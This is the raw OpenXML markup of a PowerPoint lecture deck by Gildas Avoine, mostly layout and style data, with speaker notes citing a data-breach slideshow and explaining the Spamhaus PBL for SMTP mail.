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7" r:id="rId1"/>
  </p:sldMasterIdLst>
  <p:notesMasterIdLst>
    <p:notesMasterId r:id="rId92"/>
  </p:notesMasterIdLst>
  <p:handoutMasterIdLst>
    <p:handoutMasterId r:id="rId93"/>
  </p:handoutMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="341" r:id="rId2"/>
    <p:sldId id="422" r:id="rId3"/>
    <p:sldId id="343" r:id="rId4"/>
    <p:sldId id="323" r:id="rId5"/>
    <p:sldId id="358" r:id="rId6"/>
    <p:sldId id="359" r:id="rId7"/>
    <p:sldId id="344" r:id="rId8"/>
    <p:sldId id="345" r:id="rId9"/>
    <p:sldId id="346" r:id="rId10"/>
    <p:sldId id="347" r:id="rId11"/>
    <p:sldId id="325" r:id="rId12"/>
    <p:sldId id="282" r:id="rId13"/>
    <p:sldId id="328" r:id="rId14"/>
    <p:sldId id="348" r:id="rId15"/>
    <p:sldId id="330" r:id="rId16"/>
    <p:sldId id="331" r:id="rId17"/>
    <p:sldId id="337" r:id="rId18"/>
    <p:sldId id="350" r:id="rId19"/>
    <p:sldId id="327" r:id="rId20"/>
    <p:sldId id="351" r:id="rId21"/>
    <p:sldId id="287" r:id="rId22"/>
    <p:sldId id="354" r:id="rId23"/>
    <p:sldId id="353" r:id="rId24"/>
    <p:sldId id="352" r:id="rId25"/>
    <p:sldId id="355" r:id="rId26"/>
    <p:sldId id="356" r:id="rId27"/>
    <p:sldId id="326" r:id="rId28"/>
    <p:sldId id="357" r:id="rId29"/>
    <p:sldId id="306" r:id="rId30"/>
    <p:sldId id="307" r:id="rId31"/>
    <p:sldId id="339" r:id="rId32"/>
    <p:sldId id="296" r:id="rId33"/>
    <p:sldId id="311" r:id="rId34"/>
    <p:sldId id="305" r:id="rId35"/>
    <p:sldId id="310" r:id="rId36"/>
    <p:sldId id="313" r:id="rId37"/>
    <p:sldId id="314" r:id="rId38"/>
    <p:sldId id="302" r:id="rId39"/>
    <p:sldId id="319" r:id="rId40"/>
    <p:sldId id="406" r:id="rId41"/>
    <p:sldId id="405" r:id="rId42"/>
    <p:sldId id="395" r:id="rId43"/>
    <p:sldId id="398" r:id="rId44"/>
    <p:sldId id="361" r:id="rId45"/>
    <p:sldId id="396" r:id="rId46"/>
    <p:sldId id="397" r:id="rId47"/>
    <p:sldId id="362" r:id="rId48"/>
    <p:sldId id="399" r:id="rId49"/>
    <p:sldId id="400" r:id="rId50"/>
    <p:sldId id="363" r:id="rId51"/>
    <p:sldId id="364" r:id="rId52"/>
    <p:sldId id="401" r:id="rId53"/>
    <p:sldId id="402" r:id="rId54"/>
    <p:sldId id="403" r:id="rId55"/>
    <p:sldId id="404" r:id="rId56"/>
    <p:sldId id="368" r:id="rId57"/>
    <p:sldId id="369" r:id="rId58"/>
    <p:sldId id="370" r:id="rId59"/>
    <p:sldId id="371" r:id="rId60"/>
    <p:sldId id="372" r:id="rId61"/>
    <p:sldId id="373" r:id="rId62"/>
    <p:sldId id="374" r:id="rId63"/>
    <p:sldId id="375" r:id="rId64"/>
    <p:sldId id="377" r:id="rId65"/>
    <p:sldId id="378" r:id="rId66"/>
    <p:sldId id="379" r:id="rId67"/>
    <p:sldId id="420" r:id="rId68"/>
    <p:sldId id="421" r:id="rId69"/>
    <p:sldId id="417" r:id="rId70"/>
    <p:sldId id="418" r:id="rId71"/>
    <p:sldId id="419" r:id="rId72"/>
    <p:sldId id="381" r:id="rId73"/>
    <p:sldId id="382" r:id="rId74"/>
    <p:sldId id="383" r:id="rId75"/>
    <p:sldId id="384" r:id="rId76"/>
    <p:sldId id="385" r:id="rId77"/>
    <p:sldId id="394" r:id="rId78"/>
    <p:sldId id="386" r:id="rId79"/>
    <p:sldId id="387" r:id="rId80"/>
    <p:sldId id="388" r:id="rId81"/>
    <p:sldId id="389" r:id="rId82"/>
    <p:sldId id="407" r:id="rId83"/>
    <p:sldId id="409" r:id="rId84"/>
    <p:sldId id="390" r:id="rId85"/>
    <p:sldId id="391" r:id="rId86"/>
    <p:sldId id="410" r:id="rId87"/>
    <p:sldId id="411" r:id="rId88"/>
    <p:sldId id="412" r:id="rId89"/>
    <p:sldId id="413" r:id="rId90"/>
    <p:sldId id="415" r:id="rId91"/>
  </p:sldIdLst>
  <p:sldSz cx="9144000" cy="6858000" type="screen4x3"/>
  <p:notesSz cx="7099300" cy="10234613"/>
  <p:defaultTextStyle>
    <a:defPPr>
      <a:defRPr lang="en-US"/>
    </a:defPPr>
    <a:lvl1pPr algn="l" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
      <a:spcBef>
        <a:spcPct val="0"/>
      </a:spcBef>
      <a:spcAft>
        <a:spcPct val="0"/>
      </a:spcAft>
      <a:defRPr kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="Verdana" charset="0"/>
        <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
        <a:cs typeface="+mn-cs"/>
      </a:defRPr>
    </a:lvl1pPr>
    <a:lvl2pPr marL="457200" algn="l" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
      <a:spcBef>
        <a:spcPct val="0"/>
      </a:spcBef>
      <a:spcAft>
        <a:spcPct val="0"/>
      </a:spcAft>
      <a:defRPr kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="Verdana" charset="0"/>
        <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
        <a:cs typeface="+mn-cs"/>
      </a:defRPr>
    </a:lvl2pPr>
    <a:lvl3pPr marL="914400" algn="l" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
      <a:spcBef>
        <a:spcPct val="0"/>
      </a:spcBef>
      <a:spcAft>
        <a:spcPct val="0"/>
      </a:spcAft>
      <a:defRPr kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="Verdana" charset="0"/>
        <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
        <a:cs typeface="+mn-cs"/>
      </a:defRPr>
    </a:lvl3pPr>
    <a:lvl4pPr marL="1371600" algn="l" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
      <a:spcBef>
        <a:spcPct val="0"/>
      </a:spcBef>
      <a:spcAft>
        <a:spcPct val="0"/>
      </a:spcAft>
      <a:defRPr kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="Verdana" charset="0"/>
        <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
        <a:cs typeface="+mn-cs"/>
      </a:defRPr>
    </a:lvl4pPr>
    <a:lvl5pPr marL="1828800" algn="l" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
      <a:spcBef>
        <a:spcPct val="0"/>
      </a:spcBef>
      <a:spcAft>
        <a:spcPct val="0"/>
      </a:spcAft>
      <a:defRPr kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="Verdana" charset="0"/>
        <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
        <a:cs typeface="+mn-cs"/>
      </a:defRPr>
    </a:lvl5pPr>
    <a:lvl6pPr marL="2286000" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
      <a:defRPr kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="Verdana" charset="0"/>
        <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
        <a:cs typeface="+mn-cs"/>
      </a:defRPr>
    </a:lvl6pPr>
    <a:lvl7pPr marL="2743200" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
      <a:defRPr kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="Verdana" charset="0"/>
        <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
        <a:cs typeface="+mn-cs"/>
      </a:defRPr>
    </a:lvl7pPr>
    <a:lvl8pPr marL="3200400" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
      <a:defRPr kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="Verdana" charset="0"/>
        <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
        <a:cs typeface="+mn-cs"/>
      </a:defRPr>
    </a:lvl8pPr>
    <a:lvl9pPr marL="3657600" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
      <a:defRPr kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="Verdana" charset="0"/>
        <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>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 "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77777"/>
    <a:srgbClr val="969696"/>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73" autoAdjust="0"/>
    <p:restoredTop sz="85814" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr>
      <p:cViewPr>
        <p:scale>
          <a:sx n="105" d="100"/>
          <a:sy n="105" d="100"/>
        </p:scale>
        <p:origin x="-1848" y="-920"/>
      </p:cViewPr>
      <p:guideLst>
        <p:guide orient="horz" pos="2160"/>
        <p:guide pos="2880"/>
      </p:guideLst>
    </p:cSldViewPr>
  </p:slideViewPr>
  <p:notesTextViewPr>
    <p:cViewPr>
      <p:scale>
        <a:sx n="100" d="100"/>
        <a:sy n="100" d="100"/>
      </p:scale>
      <p:origin x="0" y="0"/>
    </p:cViewPr>
  </p:notesTextViewPr>
  <p:notesViewPr>
    <p:cSldViewPr>
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="58" d="100"/>
          <a:sy n="58" d="100"/>
        </p:scale>
        <p:origin x="-1493" y="-72"/>
      </p:cViewPr>
      <p:guideLst>
        <p:guide orient="horz" pos="3224"/>
        <p:guide pos="2236"/>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notesMaster" Target="notesMasters/notesMaster1.xml"/><Relationship Id="rId93" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/handoutMaster" Target="handoutMasters/handoutMaster1.xml"/><Relationship Id="rId94" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/printerSettings" Target="printerSettings/printerSettings1.bin"/><Relationship Id="rId95" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/commentAuthors" Target="commentAuthors.xml"/><Relationship Id="rId96" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/presProps" Target="presProps.xml"/><Relationship Id="rId97" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/viewProps" Target="viewProps.xml"/><Relationship Id="rId98" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="theme/theme1.xml"/><Relationship Id="rId9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170"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9048" tIns="49524" rIns="99048" bIns="49524" numCol="1" anchor="t" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr defTabSz="990600" eaLnBrk="1" hangingPunct="1">
              <a:defRPr sz="1300">
                <a:latin typeface="Arial" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="135171" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="quarter"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9048" tIns="49524" rIns="99048" bIns="49524" numCol="1" anchor="t" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="r" defTabSz="990600" eaLnBrk="1" hangingPunct="1">
              <a:defRPr sz="1300">
                <a:latin typeface="Arial" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="135172" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="2"/>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9048" tIns="49524" rIns="99048" bIns="49524" numCol="1" anchor="b" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr defTabSz="990600" eaLnBrk="1" hangingPunct="1">
              <a:defRPr sz="1300">
                <a:latin typeface="Arial" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Gildas Avoine</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="135173" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="3"/>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9048" tIns="49524" rIns="99048" bIns="49524" numCol="1" anchor="b" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="r" defTabSz="990600" eaLnBrk="1" hangingPunct="1">
              <a:defRPr sz="1300">
                <a:latin typeface="Arial" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{69D72ABC-172D-1C43-B104-3CCEDC7FEA53}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="365956949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9048" tIns="49524" rIns="99048" bIns="49524" numCol="1" anchor="t" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr defTabSz="990600" eaLnBrk="1" hangingPunct="1">
              <a:defRPr sz="1300">
                <a:latin typeface="Arial" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3075" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt"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9048" tIns="49524" rIns="99048" bIns="49524" numCol="1" anchor="t" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="r" defTabSz="990600" eaLnBrk="1" hangingPunct="1">
              <a:defRPr sz="1300">
                <a:latin typeface="Arial" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3076" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="990600" y="768350"/>
            <a:ext cx="5118100" cy="3836988"/>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709613" y="4859338"/>
            <a:ext cx="5680075" cy="460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9048" tIns="49524" rIns="99048" bIns="4952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8" name="Rectangle 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="4"/>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9048" tIns="49524" rIns="99048" bIns="49524" numCol="1" anchor="b" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr defTabSz="990600" eaLnBrk="1" hangingPunct="1">
              <a:defRPr sz="1300">
                <a:latin typeface="Arial" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Gildas Avoine</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3079" name="Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>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9048" tIns="49524" rIns="99048" bIns="49524" numCol="1" anchor="b" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="r" defTabSz="990600" eaLnBrk="1" hangingPunct="1">
              <a:defRPr sz="1300">
                <a:latin typeface="Arial" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{929B7364-6128-7345-A504-A4AD8B7F3AD9}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2931891443"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMap bg1="lt1" tx1="dk1" bg2="lt2" tx2="dk2" accent1="accent1" accent2="accent2" accent3="accent3" accent4="accent4" accent5="accent5" accent6="accent6" hlink="hlink" folHlink="folHlink"/>
  <p:hf hdr="0" dt="0"/>
  <p:notesStyle>
    <a:lvl1pPr algn="l" rtl="0" fontAlgn="base">
      <a:spcBef>
        <a:spcPct val="30000"/>
      </a:spcBef>
      <a:spcAft>
        <a:spcPct val="0"/>
      </a:spcAft>
      <a:defRPr sz="1200" kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="Arial" charset="0"/>
        <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
        <a:cs typeface="+mn-cs"/>
      </a:defRPr>
    </a:lvl1pPr>
    <a:lvl2pPr marL="457200" algn="l" rtl="0" fontAlgn="base">
      <a:spcBef>
        <a:spcPct val="30000"/>
      </a:spcBef>
      <a:spcAft>
        <a:spcPct val="0"/>
      </a:spcAft>
      <a:defRPr sz="1200" kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="Arial" charset="0"/>
        <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
        <a:cs typeface="+mn-cs"/>
      </a:defRPr>
    </a:lvl2pPr>
    <a:lvl3pPr marL="914400" algn="l" rtl="0" fontAlgn="base">
      <a:spcBef>
        <a:spcPct val="30000"/>
      </a:spcBef>
      <a:spcAft>
        <a:spcPct val="0"/>
      </a:spcAft>
      <a:defRPr sz="1200" kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="Arial" charset="0"/>
        <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
        <a:cs typeface="+mn-cs"/>
      </a:defRPr>
    </a:lvl3pPr>
    <a:lvl4pPr marL="1371600" algn="l" rtl="0" fontAlgn="base">
      <a:spcBef>
        <a:spcPct val="30000"/>
      </a:spcBef>
      <a:spcAft>
        <a:spcPct val="0"/>
      </a:spcAft>
      <a:defRPr sz="1200" kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="Arial" charset="0"/>
        <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
        <a:cs typeface="+mn-cs"/>
      </a:defRPr>
    </a:lvl4pPr>
    <a:lvl5pPr marL="1828800" algn="l" rtl="0" fontAlgn="base">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t>Gildas Avoine</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{E1B3F84A-6DCB-6146-B39D-030C9A738A1E}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>1</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4098" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="992188" y="768350"/>
            <a:ext cx="5116512" cy="3836988"/>
          </a:xfrm>
          <a:ln/>
          <a:extLst>
            <a:ext uri="{FAA26D3D-D897-4be2-8F04-BA451C77F1D7}">
              <ma14:placeholderFlag xmlns:ma14="http://schemas.microsoft.com/office/mac/drawingml/2011/main" val="1"/>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4099" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Image source:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>www.scmagazine.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>/top-five-data-breaches-in-2013so-far/slideshow/1387/#</a:t>
            </a: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a:t>Gildas Avoine</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C5A1F6B1-0791-DF47-8A07-B7AC2D81D363}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>30</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="328706" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="990600" y="768350"/>
            <a:ext cx="5118100" cy="3838575"/>
          </a:xfrm>
          <a:ln/>
          <a:extLst>
            <a:ext uri="{FAA26D3D-D897-4be2-8F04-BA451C77F1D7}">
              <ma14:placeholderFlag xmlns:ma14="http://schemas.microsoft.com/office/mac/drawingml/2011/main" val="1"/>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="328707" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="709613" y="4862513"/>
            <a:ext cx="5680075" cy="4603750"/>
          </a:xfrm>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a:t>Gildas Avoine</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{6DFA602C-299F-FA4A-A983-5C6E3DDA8EB7}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>32</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="304130" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="990600" y="768350"/>
            <a:ext cx="5118100" cy="3838575"/>
          </a:xfrm>
          <a:ln/>
          <a:extLst>
            <a:ext uri="{FAA26D3D-D897-4be2-8F04-BA451C77F1D7}">
              <ma14:placeholderFlag xmlns:ma14="http://schemas.microsoft.com/office/mac/drawingml/2011/main" val="1"/>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="304131" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="709613" y="4862513"/>
            <a:ext cx="5680075" cy="4603750"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Avec PBL, une authentification du client devrait être demandée.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>IP address ranges which should not be delivering unauthenticated SMTP email to any Internet mail server except those provided for specifically by an ISP for that customer's use. The PBL helps networks enforce their Acceptable Use Policy for dynamic and non-MTA customer IP ranges.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a:t>Gildas Avoine</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B4AC2F6F-FE32-604A-A4BF-01E097AE9BF0}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>33</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="336898" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="992188" y="768350"/>
            <a:ext cx="5116512" cy="3836988"/>
          </a:xfrm>
          <a:ln/>
          <a:extLst>
            <a:ext uri="{FAA26D3D-D897-4be2-8F04-BA451C77F1D7}">
              <ma14:placeholderFlag xmlns:ma14="http://schemas.microsoft.com/office/mac/drawingml/2011/main" val="1"/>
